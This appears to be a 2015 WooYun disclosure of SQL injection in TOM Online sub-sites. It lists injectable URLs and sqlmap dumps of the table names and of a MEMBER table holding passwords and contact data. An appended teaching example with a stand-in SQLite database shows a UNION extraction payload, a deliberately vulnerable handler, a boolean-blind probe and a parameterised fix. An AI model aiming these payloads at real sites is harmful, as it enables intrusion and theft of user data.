
Vulnerability summary

Defect ID: wooyun-2015-0143844

Title: Several SQL injection vulnerabilities on TOM Online sub-sites leak user information

Vendor: TOM Online (TOM在线)

Author: 憋屈

Submitted: 2015-09-28 12:29

Fix time: 2015-10-11 21:30

Published: 2015-10-11 21:30

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-09-28: Details sent to the vendor, awaiting vendor action
2015-10-11: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

All of TOM's holes get ignored..

Details:

Injection points (the injectable GET parameter is noted after each URL):

http://iwatchome.tom.com/Wiki_style.php?w2_id=261&page=1 (parameter: w2_id, e.g. w2_id=261)
http://iwatchome.tom.com/Wiki_style_content.php?keyword=&w3_id=7 (parameter: w3_id, e.g. w3_id=7)
http://iwatch.tom.com/Wiki_style.php?w2_id=261&page=1 (parameter: w2_id, e.g. w2_id=261)

[Screenshot: tom1.png]

Proof of vulnerability (sqlmap enumeration output):

Database: iwatchome_cn
[50 tables]
+---------------+
| ACCOUNT |
| AD |
| AD_LOG |
| AD_SP |
| AREA |
| ARTICLE |
| ARTICLE_LOG |
| ARTICLE_RE |
| AUTHOR |
| BOOK |
| BOOK_LOG |
| BRAND |
| BRAND_BAK |
| BRAND_SERIES |
| COLLECT |
| EXAM |
| HOME_ROW |
| HOT_WATCH |
| KWORD |
| LOGS |
| MEMBER |
| MEMBER_bak |
| META_DEF |
| NEWS |
| NEW_ARRIVAL |
| PAGE_LOG |
| PRG_PRIV |
| SP_STATUS |
| STORE |
| STORE_BAK |
| STORE_BRAND |
| STORE_LOG |
| STUFF_KWORD |
| STUFF_PIC |
| STUFF_PIC_OLD |
| TALK |
| TALK_B |
| TALK_BAK |
| TALK_RE |
| TALK_RE_BAK |
| TICKET |
| VIDEO |
| WATCH |
| WATCH_LOG |
| WATCH_OLD |
| WATCH_TODAY |
| WIKI1 |
| WIKI2 |
| WIKI3 |
| test |
+---------------+
Database: iwatchome_cn
Table: MEMBER
[34 columns]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| ADDRESS | varchar(80) |
| BIRTHDAY | date |
| CELLPHONE | varchar(12) |
| COUNTY | varchar(10) |
| CREATOR | varchar(50) |
| CTIME | datetime |
| EDM | char(1) |
| EMAIL | varchar(50) |
| FACEBOOK | varchar(30) |
| GOOGLE | varchar(30) |
| GRADE | char(1) |
| IMG_FILE | varchar(200) |
| IMG_SHOW | varchar(1) |
| LAST_LOGON | datetime |
| LOGIN_COUNT | int(11) |
| MEMBER_ID | varchar(100) |
| MODIFIER | varchar(50) |
| MTIME | datetime |
| NAME | varchar(20) |
| NOTES | text |
| OCCUPATION_ID | varchar(2) |
| PASSWORD | varchar(50) |
| POINT | int(11) |
| POST_CODE | varchar(5) |
| REGION | varchar(10) |
| RTIME | datetime |
| SEQNO | int(11) |
| SEX | char(1) |
| SIGN_FILE | varchar(100) |
| SIGN_SHOW | varchar(1) |
| SNAME | varchar(30) |
| STATUS | char(1) |
| TELE | varchar(15) |
| YAHOO | varchar(30) |
+---------------+--------------+
Account names and passwords, addresses, Facebook, Google and Yahoo accounts, e-mail addresses, phone numbers and more are exposed.

[Screenshot: tom2.png]
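The report shows only URLs and sqlmap output, not the PHP behind Wiki_style.php. The following is an added example, not code from the report or from TOM Online, that reconstructs the class of bug with an in-memory SQLite stand-in: a numeric id from the query string spliced into a SELECT, the UNION payload that pulls rows out of a MEMBER-style table through the same page, the boolean-based true/false probe that tools such as sqlmap use to confirm the injection, and the hardened handler (type validation plus a bound parameter). The WIKI2 column names (W2_ID, TITLE), the MEMBER subset, all rows, e-mail addresses, phone numbers and password hashes are invented for the example.

```python
import re
import sqlite3

# Constructed stand-in data: a tiny SQLite schema imitating the WIKI2 and MEMBER
# tables named in the sqlmap dump. WIKI2's columns are assumed (the report lists
# only table names); every row, address, number and hash below is invented.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE WIKI2 (W2_ID INTEGER PRIMARY KEY, TITLE TEXT);
        CREATE TABLE MEMBER (MEMBER_ID TEXT, EMAIL TEXT, PASSWORD TEXT, CELLPHONE TEXT);
        INSERT INTO WIKI2 VALUES (261, 'Dress watches'), (262, 'Sport watches');
        INSERT INTO MEMBER VALUES
            ('alice', 'alice@example.com', 'e10adc3949ba59abbe56e057f20f883e', '13800000001'),
            ('bob',   'bob@example.com',   '5f4dcc3b5aa765d61d8327deb882cf99', '13800000002');
    """)
    return conn


# UNION payload for w2_id: two columns, matching the page's own SELECT, so the
# database accepts it and MEMBER rows come back through the wiki page.
UNION_PAYLOAD = "261 UNION SELECT MEMBER_ID, PASSWORD FROM MEMBER"


def wiki_style_vulnerable(conn, w2_id):
    """Assumed shape of the bug behind Wiki_style.php?w2_id=...: the raw query
    string value is concatenated into the SQL text, so appended SQL executes."""
    sql = f"SELECT W2_ID, TITLE FROM WIKI2 WHERE W2_ID = {w2_id}"
    return conn.execute(sql).fetchall()


def parse_id(value):
    """Accept only a plain decimal integer; anything else is rejected."""
    text = str(value).strip()
    return int(text) if re.fullmatch(r"[0-9]+", text) else None


def wiki_style_safe(conn, w2_id):
    """Hardened handler: validate the type, then bind the value as a parameter
    so the database only ever compares it and never parses it as SQL."""
    wid = parse_id(w2_id)
    if wid is None:
        return []  # a real handler would answer HTTP 400 here
    return conn.execute(
        "SELECT W2_ID, TITLE FROM WIKI2 WHERE W2_ID = ?", (wid,)
    ).fetchall()


def boolean_blind_differs(query_fn, conn, base_id):
    """The probe used to confirm boolean-based blind injection: append a true
    and a false condition to a known-good id and compare the two responses.
    A difference means the condition reached the SQL engine."""
    true_rows = query_fn(conn, f"{base_id} AND 1=1")
    false_rows = query_fn(conn, f"{base_id} AND 1=2")
    return true_rows != false_rows


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, w2_id=261 :", wiki_style_vulnerable(conn, "261"))
    print("vulnerable, UNION     :", wiki_style_vulnerable(conn, UNION_PAYLOAD))
    print("safe, UNION           :", wiki_style_safe(conn, UNION_PAYLOAD))
    print("blind probe differs (vulnerable):", boolean_blind_differs(wiki_style_vulnerable, conn, 261))
    print("blind probe differs (safe)      :", boolean_blind_differs(wiki_style_safe, conn, 261))
```

In the vulnerable handler the UNION payload returns the wiki row plus one row per member, which is exactly how a page that was only meant to render a watch-style wiki entry ends up serving MEMBER_ID and PASSWORD pairs. The same fix applies to w3_id on Wiki_style_content.php: cast the id, then use a prepared statement (mysqli or PDO in PHP) rather than string concatenation.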

Fix:

Copyright notice: please credit 憋屈@乌云 (WooYun) when reposting.


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-10-11 21:30

Vendor reply:

Vulnerability Rank: 4 (WooYun assessment)

Latest status:

None yet